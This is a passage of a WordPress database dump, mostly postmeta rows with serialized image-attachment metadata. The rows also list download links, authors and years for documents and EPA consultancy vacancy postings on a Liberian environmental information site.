i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:22:\"small-logo-512x450.png\";s:5:\"width\";i:512;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33500,4790,'_wp_attached_file','2022/07/cropped-small-logo.png'),(33501,4790,'_wp_attachment_context','site-icon'),(33502,4790,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:30:\"2022/07/cropped-small-logo.png\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"cropped-small-logo-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"cropped-small-logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:30:\"cropped-small-logo-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:29:\"cropped-small-logo-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:30:\"cropped-small-logo-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:30:\"cropped-small-logo-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:30:\"cropped-small-logo-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:30:\"cropped-small-logo-512x450.png\";s:5:\"width\";i:512;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-270\";a:4:{s:4:\"file\";s:30:\"cropped-small-logo-270x270.png\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-192\";a:4:{s:4:\"file\";s:30:\"cropped-small-logo-192x192.png\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-180\";a:4:{s:4:\"file\";s:30:\"cropped-small-logo-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"site_icon-32\";a:4:{s:4:\"file\";s:28:\"cropped-small-logo-32x32.png\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33505,4792,'_last_editor_used_jetpack','classic-editor'),(33506,4792,'_edit_lock','1659015041:42'),(33507,4792,'_edit_last','42'),(33508,4793,'_wp_attached_file','2022/07/Cammues-Presentation.png'),(33509,4793,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:32:\"2022/07/Cammues-Presentation.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"Cammues-Presentation-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"Cammues-Presentation-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:32:\"Cammues-Presentation-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:31:\"Cammues-Presentation-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:32:\"Cammues-Presentation-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:32:\"Cammues-Presentation-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:32:\"Cammues-Presentation-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33511,4795,'_wp_attached_file','2022/07/Cammue.pdf'),(33512,4792,'_wp_page_template','default'),(33513,4792,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/07/Cammue.pdf'),(33514,4792,'by','Datuama J. S. Cammue'),(33515,4792,'year','2022'),(33516,4792,'_pods_document_cover_image','a:1:{i:0;i:4793;}'),(33518,4792,'_pods_attached_document','a:1:{i:0;i:4795;}'),(33520,4792,'document_cover_image','4793'),(33521,4792,'attached_document','4795'),(33522,4797,'_last_editor_used_jetpack','classic-editor'),(33523,4797,'_edit_lock','1659015532:42'),(33524,4797,'_edit_last','42'),(33525,4798,'_wp_attached_file','2022/07/Cammue-2.png'),(33526,4798,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:20:\"2022/07/Cammue-2.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"Cammue-2-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"Cammue-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"Cammue-2-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:19:\"Cammue-2-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:20:\"Cammue-2-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:20:\"Cammue-2-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:20:\"Cammue-2-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33527,4799,'_wp_attached_file','2022/07/Mr.-Cammue.pdf'),(33528,4797,'_wp_page_template','default'),(33529,4797,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/07/Mr.-Cammue.pdf'),(33530,4797,'by','Datuama J. S. Cammue'),(33531,4797,'year','2022'),(33532,4797,'_pods_document_cover_image','a:1:{i:0;i:4798;}'),(33534,4797,'_pods_attached_document','a:1:{i:0;i:4799;}'),(33536,4797,'document_cover_image','4798'),(33537,4797,'attached_document','4799'),(33538,4802,'_last_editor_used_jetpack','classic-editor'),(33539,4802,'_edit_lock','1659015912:42'),(33540,4802,'_edit_last','42'),(33541,4803,'_wp_attached_file','2022/07/Princess.png'),(33542,4803,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:20:\"2022/07/Princess.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"Princess-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"Princess-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"Princess-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:19:\"Princess-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:20:\"Princess-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:20:\"Princess-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:20:\"Princess-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33543,4804,'_wp_attached_file','2022/07/Princesss-Presentation.pdf'),(33544,4802,'_wp_page_template','default'),(33545,4802,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/07/Princesss-Presentation.pdf'),(33546,4802,'by','Princess Blango Doyah'),(33547,4802,'year','2022'),(33548,4802,'_pods_document_cover_image','a:1:{i:0;i:4803;}'),(33549,4802,'document_cover_image','4803'),(33550,4802,'_pods_attached_document','a:1:{i:0;i:4804;}'),(33551,4802,'attached_document','4804'),(33552,570,'_last_editor_used_jetpack','classic-editor'),(33553,570,'_wp_page_template','default'),(33554,570,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(33557,1695,'_last_editor_used_jetpack','classic-editor'),(33558,4807,'_wp_attached_file','2019/11/Untitled-1.png'),(33559,4807,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:22:\"2019/11/Untitled-1.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-1-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-1-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:21:\"Untitled-1-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:22:\"Untitled-1-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:22:\"Untitled-1-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:22:\"Untitled-1-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33560,570,'document_cover_image','1686'),(33561,570,'attached_document','571'),(33562,4810,'_wp_attached_file','2019/11/Untitled-2.png'),(33563,4810,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:22:\"2019/11/Untitled-2.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-2-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-2-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:21:\"Untitled-2-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:22:\"Untitled-2-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:22:\"Untitled-2-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:22:\"Untitled-2-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33564,1695,'_wp_page_template','default'),(33565,1695,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(33566,1695,'document_cover_image','1686'),(33567,1695,'attached_document','1696'),(33568,1697,'_last_editor_used_jetpack','classic-editor'),(33569,1697,'_wp_page_template','default'),(33570,1697,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(33571,1697,'document_cover_image','1686'),(33572,1697,'attached_document','1698'),(33573,1699,'_last_editor_used_jetpack','classic-editor'),(33574,1699,'_wp_page_template','default'),(33575,1699,'_pods_document_cover_image','a:1:{i:0;i:1694;}'),(33576,1699,'document_cover_image','1694'),(33577,1699,'attached_document','1700'),(33578,1701,'_last_editor_used_jetpack','classic-editor'),(33579,1701,'_wp_page_template','default'),(33580,1701,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(33581,1701,'document_cover_image','1686'),(33582,1701,'attached_document','2554'),(33583,1703,'_last_editor_used_jetpack','classic-editor'),(33584,1703,'_wp_page_template','default'),(33585,1703,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(33586,1703,'document_cover_image','1686'),(33587,1703,'attached_document','1704'),(33588,1705,'_last_editor_used_jetpack','classic-editor'),(33589,1705,'_wp_page_template','default'),(33590,1705,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(33591,1705,'document_cover_image','1686'),(33592,1705,'attached_document','1706'),(33593,1707,'_last_editor_used_jetpack','classic-editor'),(33594,1707,'_wp_page_template','default'),(33595,1707,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(33596,1707,'document_cover_image','1686'),(33597,1707,'attached_document','1708'),(33598,1709,'_last_editor_used_jetpack','classic-editor'),(33599,1709,'_wp_page_template','default'),(33600,1709,'_pods_document_cover_image','a:1:{i:0;i:2928;}'),(33601,1709,'document_cover_image','2928'),(33602,1709,'attached_document','1710'),(33603,1711,'_last_editor_used_jetpack','classic-editor'),(33607,4826,'_wp_attached_file','2022/08/PMU-ADVERT-websites-EDITED.pdf'),(33608,4827,'_last_editor_used_jetpack','classic-editor'),(33609,4827,'_edit_lock','1659509918:42'),(33610,4827,'_edit_last','42'),(33611,4827,'_wp_page_template','default'),(33612,4827,'closed_date','2022-08-15'),(33613,4827,'owner','EPA'),(33614,4827,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf'),(33615,4830,'_last_editor_used_jetpack','classic-editor'),(33616,4830,'_edit_lock','1659509978:42'),(33617,4830,'_edit_last','42'),(33618,4830,'_wp_page_template','default'),(33619,4830,'closed_date','2022-08-15'),(33620,4830,'owner','EPA'),(33621,4830,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf'),(33622,4832,'_last_editor_used_jetpack','classic-editor'),(33623,4832,'_edit_lock','1659510028:42'),(33624,4832,'_edit_last','42'),(33625,4832,'_wp_page_template','default'),(33626,4832,'closed_date','2022-08-15'),(33627,4832,'owner','EPA'),(33628,4832,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf'),(33629,4835,'_last_editor_used_jetpack','classic-editor'),(33630,4835,'_edit_lock','1659510076:42'),(33631,4835,'_edit_last','42'),(33632,4835,'_wp_page_template','default'),(33633,4835,'closed_date','2022-08-15'),(33634,4835,'owner','EPA'),(33635,4835,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf'),(33636,4837,'_last_editor_used_jetpack','classic-editor'),(33637,4837,'_edit_lock','1659510260:42'),(33638,4837,'_edit_last','42'),(33639,4837,'_wp_page_template','default'),(33640,4837,'closed_date','2022-08-15'),(33641,4837,'owner','EPA'),(33642,4837,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf'),(33643,4840,'_last_editor_used_jetpack','classic-editor'),(33644,4840,'_edit_lock','1659510156:42'),(33645,4840,'_edit_last','42'),(33646,4840,'_wp_page_template','default'),(33647,4840,'closed_date','2022-08-15'),(33648,4840,'owner','EPA'),(33649,4840,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf'),(33650,4842,'_last_editor_used_jetpack','classic-editor'),(33651,4842,'_edit_lock','1659510198:42'),(33652,4842,'_edit_last','42'),(33653,4842,'_wp_page_template','default'),(33654,4842,'closed_date','2022-08-15'),(33655,4842,'owner','EPA'),(33656,4842,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf'),(33657,4845,'_last_editor_used_jetpack','classic-editor'),(33658,4845,'_edit_lock','1659510239:42'),(33659,4845,'_edit_last','42'),(33660,4845,'_wp_page_template','default'),(33661,4845,'closed_date','2022-08-15'),(33662,4845,'owner','EPA'),(33663,4845,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf'),(33664,4827,'_wp_old_slug','consultancy-to-project-manager-for-pmu-project'),(33668,4827,'_wp_old_slug','consultancy-for-project-manager-for-pmu-project'),(33669,4830,'_wp_old_slug','consultancy-for-project-assistant-for-pmu-project'),(33670,4832,'_wp_old_slug','consultancy-for-chief-technical-advisor'),(33671,4835,'_wp_old_slug','consultancy-for-project-administration-finance-officer-for-pmu-project'),(33672,4837,'_wp_old_slug','consultancy-for-project-procurement-officer-for-pmu-project'),(33673,4840,'_wp_old_slug','consultancy-for-monitoring-evaluation-officer-for-pmu-project'),(33674,4842,'_wp_old_slug','consultancy-for-gender-officer-for-pmu-project'),(33675,4845,'_wp_old_slug','consultancy-for-safeguard-officer-for-pmu-project'),(33676,4858,'_last_editor_used_jetpack','classic-editor'),(33677,4858,'_edit_lock','1660129136:42'),(33678,4858,'_edit_last','42'),(33679,4859,'_wp_attached_file','2022/08/2014_gvl_report_.pdf'),(33680,4860,'_wp_attached_file','2022/08/Untitled.png'),(33681,4860,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:20:\"2022/08/Untitled.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"Untitled-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"Untitled-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"Untitled-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:19:\"Untitled-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:20:\"Untitled-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:20:\"Untitled-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:20:\"Untitled-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33682,4858,'_wp_page_template','default'),(33683,4858,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/08/2014_gvl_report_.pdf'),(33684,4858,'by','WCF'),(33685,4858,'year','2014'),(33686,4858,'_pods_document_cover_image','a:1:{i:0;i:4860;}'),(33687,4858,'document_cover_image','4860'),(33688,4858,'_pods_attached_document','a:1:{i:0;i:4859;}'),(33689,4858,'attached_document','4859'),(33690,4862,'_last_editor_used_jetpack','classic-editor'),(33691,4862,'_edit_lock','1660130210:42'),(33692,4863,'_wp_attached_file','2022/08/CBD-LIBERIA-map.pdf'),(33693,4862,'_edit_last','42'),(33694,4864,'_wp_attached_file','2022/08/Untitled-1.png'),(33695,4864,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:22:\"2022/08/Untitled-1.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-1-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-1-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:21:\"Untitled-1-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:22:\"Untitled-1-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:22:\"Untitled-1-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:22:\"Untitled-1-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33696,4862,'_wp_page_template','default'),(33697,4862,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/08/CBD-LIBERIA-map.pdf'),(33698,4862,'by','J.S. Datuama Cammue'),(33699,4862,'year',''),(33700,4862,'_pods_document_cover_image','a:1:{i:0;i:4864;}'),(33701,4862,'document_cover_image','4864'),(33702,4862,'_pods_attached_document','a:1:{i:0;i:4863;}'),(33703,4862,'attached_document','4863'),(33704,4866,'_last_editor_used_jetpack','classic-editor'),(33705,4866,'_edit_lock','1660132302:42'),(33706,4867,'_wp_attached_file','2022/08/cbd1235.pdf'),(33707,4868,'_wp_attached_file','2022/08/Untitled-2.png'),(33708,4868,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:22:\"2022/08/Untitled-2.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-2-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-2-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:21:\"Untitled-2-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:22:\"Untitled-2-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:22:\"Untitled-2-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:22:\"Untitled-2-300x450.png\";s:5:\"width\";i:300;s